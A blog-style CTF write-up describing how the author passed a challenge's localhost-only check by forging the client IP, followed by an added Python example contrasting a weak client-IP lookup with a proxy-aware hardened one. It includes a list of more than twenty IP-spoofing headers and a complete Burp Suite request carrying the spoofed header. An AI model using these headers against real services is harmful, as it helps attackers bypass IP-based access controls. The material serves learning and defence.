Not just XFF

Published 2023-10-11 22:39:10 Author: gaifa_gafin

Yesterday I did a very simple CTF challenge from a freshman contest.
[screenshot: 2023-09-30T06:05:35.png]

The earlier steps were all very simple, like this one:
[screenshot: 2023-09-30T06:06:11.png]

Following the challenge hints step by step, I arrived at the final step:

[screenshot: 2023-09-30T06:06:22.png]

My first thought was to set X-Forwarded-For to 127.0.0.1, but that did not work.

Then I searched online and found that there are many headers that can be used to forge the request IP:

X-Forwarded-For:127.0.0.1
X-Forwarded:127.0.0.1
Forwarded-For:127.0.0.1
Forwarded:127.0.0.1
X-Forwarded-Host:127.0.0.1
X-remote-IP:127.0.0.1
X-remote-addr:127.0.0.1
True-Client-IP:127.0.0.1
X-Client-IP:127.0.0.1
Client-IP:127.0.0.1
X-Real-IP:127.0.0.1
Ali-CDN-Real-IP:127.0.0.1
Cdn-Src-Ip:127.0.0.1
Cdn-Real-Ip:127.0.0.1
CF-Connecting-IP:127.0.0.1
X-Cluster-Client-IP:127.0.0.1
WL-Proxy-Client-IP:127.0.0.1
Proxy-Client-IP:127.0.0.1
Fastly-Client-Ip:127.0.0.1
True-Client-Ip:127.0.0.1
Host: 127.0.0.1
X-Originating-IP: 127.0.0.1

I tried them one by one; the one I ended up using was X-Real-IP:127.0.0.1

Sent with Burp Suite:

POST /?ctf=111 HTTP/1.1
Host: node4.buuoj.cn:26965
User-Agent:NewStarCTF2023
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: newstarctf.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Origin: http://node4.buuoj.cn:26965
Connection: close
Cookie: power=ctfer
Upgrade-Insecure-Requests: 1
X-Client-IP: 127.0.0.1

secret=n3wst4rCTF2023g00000d

Result: [screenshot: 2023-09-30T06:06:47.png]
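As an added example (not part of the original writeup, and not the challenge's own code), here is the weak client-IP lookup this challenge models, next to a hardened version: only X-Forwarded-For is consulted, only when the TCP peer is a configured trusted proxy, and the chain is walked from the right so a client-supplied leftmost value is never believed. The header list, the trusted-proxy range and the sample request values are constructed for illustration.

```python
import ipaddress

# Client-settable headers from the list above (constructed for this example).
# A lookup that consults any of these is what the challenge's "localhost only"
# check was doing, which is why a single spoofed header passed it.
SPOOFABLE_HEADERS = [
    "X-Forwarded-For", "X-Forwarded", "Forwarded-For", "Forwarded",
    "X-Forwarded-Host", "X-Remote-IP", "X-Remote-Addr", "True-Client-IP",
    "X-Client-IP", "Client-IP", "X-Real-IP", "Ali-CDN-Real-IP", "Cdn-Src-Ip",
    "Cdn-Real-Ip", "CF-Connecting-IP", "X-Cluster-Client-IP",
    "WL-Proxy-Client-IP", "Proxy-Client-IP", "Fastly-Client-Ip",
    "X-Originating-IP",
]


def weak_client_ip(headers, remote_addr):
    """Weak pattern: return the first IP-carrying header found, else the peer."""
    lower = {k.lower(): v for k, v in headers.items()}
    for name in SPOOFABLE_HEADERS:
        value = lower.get(name.lower())
        if value:
            return value.split(",")[0].strip()
    return remote_addr


def safe_client_ip(headers, remote_addr, trusted_proxies):
    """Hardened pattern: trust X-Forwarded-For only behind a known proxy,
    and take the rightmost hop that is not itself a trusted proxy."""
    trusted = [ipaddress.ip_network(p) for p in trusted_proxies]

    def is_trusted(ip):
        try:
            return any(ipaddress.ip_address(ip) in net for net in trusted)
        except ValueError:  # malformed address is never trusted
            return False

    if not is_trusted(remote_addr):
        return remote_addr  # direct connection: every proxy header is ignored
    lower = {k.lower(): v for k, v in headers.items()}
    chain = [h.strip() for h in lower.get("x-forwarded-for", "").split(",") if h.strip()]
    for hop in reversed(chain):  # proxies append on the right; walk back to the client
        if not is_trusted(hop):
            return hop
    return remote_addr  # chain empty or entirely trusted: fall back to the peer


def is_localhost(ip):
    """The check the challenge enforced, applied to a resolved client IP."""
    try:
        return ipaddress.ip_address(ip).is_loopback
    except ValueError:
        return False
```

With the constructed request carrying only X-Client-IP: 127.0.0.1 from a public peer, the weak lookup says localhost and the hardened one does not; behind a trusted proxy, a spoofed 127.0.0.1 on the left of X-Forwarded-For is skipped in favour of the hop the proxy appended.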